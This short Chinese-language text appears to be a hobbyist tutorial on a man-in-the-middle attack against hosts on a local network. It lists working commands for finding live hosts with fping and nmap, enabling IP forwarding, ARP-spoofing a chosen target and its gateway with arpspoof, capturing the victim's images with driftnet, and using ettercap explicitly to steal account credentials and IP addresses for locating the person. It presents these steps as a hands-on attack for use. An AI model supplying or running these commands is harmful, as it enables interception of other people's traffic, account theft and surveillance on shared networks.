知识贮备:
fping -g 172.16.9.1/24
然后利用nmap工具监测局域网下存活主机,确定一个目标
nmap -sP 192.168.1.0/24 //-sP后面根据自己网络填网段
ettercap -Tq -i eth0 //这条命令表示监控eth0网卡的流量(-T 文本模式运行 -q 安静模式 -i 网卡,后接网卡名)
driftnet -i eth0 //捕获经过eth0的图片并显示(-i 网卡,后接网卡名)
实战
echo 1 >/proc/sys/net/ipv4/ip_forward //这句意思是向这个文件写入1(不断网攻击) arpspoof -i eth0 -t 192.168.1.201 192.168.1.1 //-i后面是网卡,-t 后面填目标ip 最后的填网关
1: driftnet -i eth0 // (捕获图片)既然目标流量会经过我们这里,那么开启一下driftnet ,便可捕获图片,我们新开一个终端,输入命令 2: ettercap -Tq -i eth0 //盗号、抓取IP(进一步实现定位)
